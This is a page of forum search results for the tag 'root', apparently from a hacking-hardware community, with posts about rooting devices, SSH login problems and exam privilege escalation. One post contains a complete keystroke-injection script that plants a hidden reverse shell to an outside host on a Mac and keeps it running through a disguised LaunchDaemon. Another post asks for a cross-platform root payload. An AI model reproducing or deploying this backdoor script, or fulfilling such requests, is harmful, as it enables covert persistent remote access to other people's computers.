Search the Community
Showing results for tags 'root'.
Found 13 results
-
Hi guys & girls, what is the best way to root an android tablet? The tablet in question is a Asus Zen pad z300m. was wondering if Kali linux would run on this device? if not, what can I install on the tablet to learn wireless security. Can I also install nmap?
-
When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
- 13 replies
-
- 1
-
-
- ssh
- rndis_ethernet
- (and 2 more)
-
Hello, is there a way to convert AP121U with Pineapple firmware back to original Alfa firmware? Thanks.
-
I have a Belkin N150 router, which has a few known vulnerabilities. https://www.exploit-db.com/exploits/38840/ Based on the vulnerabilities listed, the best option seems to be the root telnet access. The method works, and a root shell is obtained. I am able to view directories and execute commands. The router itself runs a version of busybox. I understand everything up to this point, but I'm not sure where to go from here. I would like to be able to either obtain the admin page password or be able to reset the password to the default. I am at an utter loss as to how to accomplish this task. The admin web app relies heavily on javascript and a cgi-bin script. I think the cgi-bin script handles all of the authentication through a JSON string. My attempts to recover the password so far have been attempting to decompile the cgi-bin script using recstudio, but i can only get what looks like assembly code, which i can't read. I have also tried using hydra to brute force the password, but I can't seem to get the parameters correct. I don't know if hydra will even work on this web page since the http-get parameters are encoded in base64 and sent directly to the cgi script. I don't see any shell scripts or commands that could be used to reset the password via telnet. Any help or suggestions are very appreciated.
-
I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule
-
I got a smoking deal on this LG VK700 Tablet. I'm pretty happy with the device but I'd like to have a root terminal. It's a Linux device and Linux without root feels kinda wierd. Any of you guys rooted one of these things? The carrier is Verizon if that makes a difference. I've looked up instructions on rooting an Android device. But there are a lot of warnings about bricking the device. I'm not totally sure how the whole thing works. I have a micro SD and SD reader along with a Linux machine with MTP installed. Is this going to work or do I need additional hardware?
-
Retail version of the VZ note 4 and a chinease team have created a temporary root method, that apparently lasts until reboot. However, there's been some questions of the security of the phones data and conflicts with SuperSu (with the retail versions). After a virtual OS is loaded on the mircro SD, looks like kingroot exploits the boot loader to boot a OS that is installed on a the micro SD card then, is running in read-only on the locked bootloader and writes over changes in the RAM to give root access to apps. But some users say the more apps they root, the more the phone will reboot itself, I'm guessing Knox is catching the discripencies of the HHD and RAM? 1. I'm not sure how legit the app is and so far it seems like it works for KitKat 4.4.4, not too sure about Lolipop 5.0.1. 2. The SD card would be paritioned with Fat32 and Ext4, seems odd. 3. Retailers encrypt the bootloader with SHA-256, generating hash key seems impossible. 4. Would it be possible to boot into a custom boot loader rather than a OS? Then flash the stock ROM with a new bootloader and OS?
-
Hello all I know this questions was asked a few years but the OP decided not to post the solution for good reason. I just recently passed the written portion of the CPT exam and now I am working on the practical. The goal to get root on 2 Linux boxes. One is a CentOS that I was able to get 3 accounts including root. It was pretty easy. One of the user accounts worked on the second Linux box which is a Red Hat server running Linux Kernel 2.4.20-8. There are all kinds of services that show up on nmap but none seem to allow escalation of privileges. I tried a few kernel exploits like the sock_sendpage in metasploit but no joy. I then started reading up on SUID and thought that may be the direction to take. All I need to do it gain root on the Red Hat box or get a hold of the shadow file some how. Anyone willing to assist me with this? Thanks
-
Hey! I am running kali linux the latest build. I am running it from a USB drive in persistence mode. I have a macbook pro and it won't boot from the USB so I have to boot from the live CD till the GRUB and then choose live usb persistence to login to the system. I wanted to change my root passwd so while I was logged into my root account, I issued the command passwd root That asked me for a new passwd twice and I entered it both the times correctly. Later when I rebooted the system, it wont accept the new passwd (not the old one also) and wont let me login saying authentication failure. I have a second account on the box called "phantom" which does not have sudo privileges and both sudo passwd root sudo adduser phantom sudo does not work! Directly trying to edit the sudoers file from this second account does not let me do so cause I dont have sudo rights. Pressing 'e' in GRUB when I select the USB option does not work. What is the way around this? I can't afford to reinstall and lose the system. Any help is appreciated...
-
Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol) REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER
-
Running unsigned code on some Roku media streaming boxes
maximus64 posted a topic in Everything Else
Roku recently introduced vulnerability within the Roku OS which allows a user to execute commands as a root user. Hilariously enough, this vulnerability came to light through a "security improvement" in the OS. This allows all Roku devices which are using update #### to obtain root. blog.gtvhacker.com/2013/breaking-secure-boot-on-the-roku/ follow us on twitter @GTVHacker -
I need someone to write a payload for me that will hack the root of a windows, mac, and linux computer. The payload will be used for a my science project for school. I will include credit to you in my science research paper, i need this soon, if you can help it would be awesome. thanks, msg me if you have any questions.
-
Hey all, as the topic pretty much lays out, my question is whether the /root/.ssh of the pineapple mark IV supposed to be empty? theres no known_host, or anything else. i just re-flashed and still nothing. Im also having some problems with karma and the USB so im trying to figure out if theres like some files missing, or more likely my noobness is preventing me from getting all setup. Anyone whose willing to talk me through some of this stuff will receive no money, but when you die, on your deathbed you will receive total consciousness..... which would be nice. So ya, if you know about the host thing or you wana help a brother out leave a post. Thanks. -Scanner Martel
